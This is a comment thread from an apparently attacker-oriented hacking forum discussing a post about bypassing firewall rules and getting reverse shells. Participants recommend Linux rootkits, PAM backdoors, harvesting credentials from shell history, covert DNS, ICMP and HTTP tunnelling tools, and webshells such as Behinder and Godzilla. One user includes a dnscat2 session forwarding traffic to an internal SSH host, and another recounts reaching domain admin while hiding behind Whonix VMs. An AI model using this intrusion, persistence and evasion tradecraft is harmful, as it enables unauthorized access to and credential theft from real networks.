Anyway, The URL you posted is talking about a vulnerability that effects Sophos firewall, it's a zero day vulnerability. And my article is explaining how you can bypass the Firewall Filter Rules and access what's behind , create your own tunnels until you get a reverse shell, and this method can be implemented for any firewall not just Sophos BECAUSE IT'S NOT VULNERABILITY, IT'S A BYPASSING TECHNIQUE
Sophos firewall is just a small part of this article, the article is talking about many advanced techniques not just how to bypass the Firewall hard rules.

 

[gr1ff1th]

Отличная статья, лайк.

 

[fedor_shkafchik]

Ты что не видел того легендарного видео, где НСД сидел как будто бы запуганный с ментовской мордой ВораВЗаконе и заикающимся голосом объяснял систему флуда через скайп, которую они прикрутили к Gozi и предлагали в аренду? И оба пытались доказать Мазе, какие они, мать его, успешные киберпреступники?

Прошу прощения за оффтоп.

ходят слухи, что он до сих пор не понял, где и что пищит. и уборщица тоже) говорю же - таких больше не производят

 

[Kumarin]

oh my god, what books do you read to know all tha shit??(( its fckng incredible for me. im lammer as fuck. jesus...guys please send some literature about all that shit, i want to know everything

 

[rwanda]

Hey man, great article.
I really liked how you abused the juicy configuration and databases to move across the linux part of the network.
I'm not a fan of writing ssh auth keys, but if you dont care (or have more time) give a shot for this linux rootkits:

GitHub - mempodippy/vlany: Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)

Linux LD_PRELOAD rootkit (x86 and x86_64 architectures) - mempodippy/vlany

github.com

GitHub - m0nad/Diamorphine: LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)

LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64) - m0nad/Diamorphine

github.com

Also i had success getting some credentials on .history files.
keep up the good job!

 

[spyboy]

Hey man, great article.
I really liked how you abused the juicy configuration and databases to move across the linux part of the network.
I'm not a fan of writing ssh auth keys, but if you dont care (or have more time) give a shot for this linux rootkits:

GitHub - mempodippy/vlany: Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)

Linux LD_PRELOAD rootkit (x86 and x86_64 architectures) - mempodippy/vlany

github.com

GitHub - m0nad/Diamorphine: LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)

LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64) - m0nad/Diamorphine

github.com

Also i had success getting some credentials on .history files.
keep up the good job!

I'm happy you liked it. And yes planting a rookit is a great technique especially when the ssh protocol is not enabled by uploading it and scheduling the execution it will bypass some limitations. Thank you for your response and the addition to the article

 

[spyboy]

oh my god, what books do you read to know all tha shit??(( its fckng incredible for me. im lammer as fuck. jesus...guys please send some literature about all that shit, i want to know everything

Dude as I mentioned in the article you can ask me anything and I will answer. I tried my best to explain everything in details so if you didn't understand something just go ahead and ask me

 

[rwanda]

I'm happy you liked it. And yes planting a rookit is a great technique especially when the ssh protocol is not enabled by uploading it and scheduling the execution it will bypass some limitations. Thank you for your response and the addition to the article

Yea its really grant, depending on your necessity you could also go for a PAM backdoor.
You can get lucky snatching credentials via ftp,mysql,sudo,su and other stuff. If they use ssh keys we kinda get into a dead-end (i feel you).
Also I don't if you knew but we can also create tunnels via dns using dnscat!
Using the listen option we can do something like
--------------------
command (websrv-app2) 15> listen 127.0.0.1:7001 10.200.76.51:22
Listening on 127.0.0.1:7001, sending connections to 10.200.76.51:22
command (websrv-app2) 15> Connection from 127.0.0.1:35064; forwarding to 10.200.76.51:22...
[Tunnel 0] connection successful!
--------------------------
^
So if you struggling writing webshell you could also go str8 for dnscat tunnels (but its slow as fukkk) [the command above was reproducing in a linux machine]

 

[spyboy]

Yea its really grant, depending on your necessity you could also go for a PAM backdoor.
You can get lucky snatching credentials via ftp,mysql,sudo,su and other stuff. If they use ssh keys we kinda get into a dead-end (i feel you).
Also I don't if you knew but we can also create tunnels via dns using dnscat!
Using the listen option we can do something like
--------------------
command (websrv-app2) 15> listen 127.0.0.1:7001 10.200.76.51:22
Listening on 127.0.0.1:7001, sending connections to 10.200.76.51:22
command (websrv-app2) 15> Connection from 127.0.0.1:35064; forwarding to 10.200.76.51:22...
[Tunnel 0] connection successful!
--------------------------
^
So if you struggling writing webshell you could also go str8 for dnscat tunnels (but its slow as fukkk) [the command above was reproducing in a linux machine]

Exactly, as a good alternative for linux OS we can use iodine dns tunnels it's much faster than DNSCat2 but sometimes it doesn't work well. But there is much better option which is "hans" which uses ICMP protocol which makes it much faster and stable at the same time, but in my case it wasn't allowed through the firewall that's why I tried to tunnel of http. Sometimes, you will need to send your traffic over ssh over http
ssh->http, this happens when we have an internal firewall with any kind of detection systems

 

[rwanda]

Exactly, as a good alternative for linux OS we can use iodine dns tunnels it's much faster than DNSCat2 but sometimes it doesn't work well. But there is much better option which is "hans" which uses ICMP protocol which makes it much faster and stable at the same time, but in my case it wasn't allowed through the firewall that's why I tried to tunnel of http. Sometimes, you will need to send your traffic over ssh over http
ssh->http, this happens when we have an internal firewall with any kind of detection systems

Yea, I didn't had much contact with iodine tunnels. Will check out in a next opportunity when dnscat doesn't do the work. I had success with https://github.com/utoni/ptunnel-ng in the past for pivoting some basic shit via ICMP =))
And when it comes to http webshell tunnels i'm a big fan of regeorge and pivotnacci ( https://github.com/blackarrowsec/pivotnacci).
Getting ssh is cool because we also get more flexibilty and pty/tty session, which is teh best @ linux scenarios.
I faced some similar situation on a windows network some months ago. Not even DNS was allowed! SO i went for writing a tunnel webshell and doing most shit via impacket and nmap (via socks).
Pain in the ass, but eventually I got DA and used some whonix VMS to make the RDP from my tunnel webshell (change the tunnel from localhost like ur vps to something like the vps external IP so it acts like a 'external' proxy).

 

[spyboy]

rwanda That's really great. Talking about webshells, have you ever tried BEHINDER ? https://github.com/Freakboy/Behinder
It's an amazing webshell ans supports metasploit meterpreter and cobalt strike

 

[spyboy]

rwanda there is also antsword but I love behinder

 

[rwanda]

rwanda That's really great. Talking about webshells, have you ever tried BEHINDER ? https://github.com/Freakboy/Behinder
It's an amazing webshell ans supports metasploit meterpreter and cobalt strike

Not yet, some friends used but i personally havent.
I tested the godzilla webshell https://github.com/BeichenDream/Godzilla/ recently but i don't think its the best when it comes to bypassing network restrictions lol.
But its very handy tool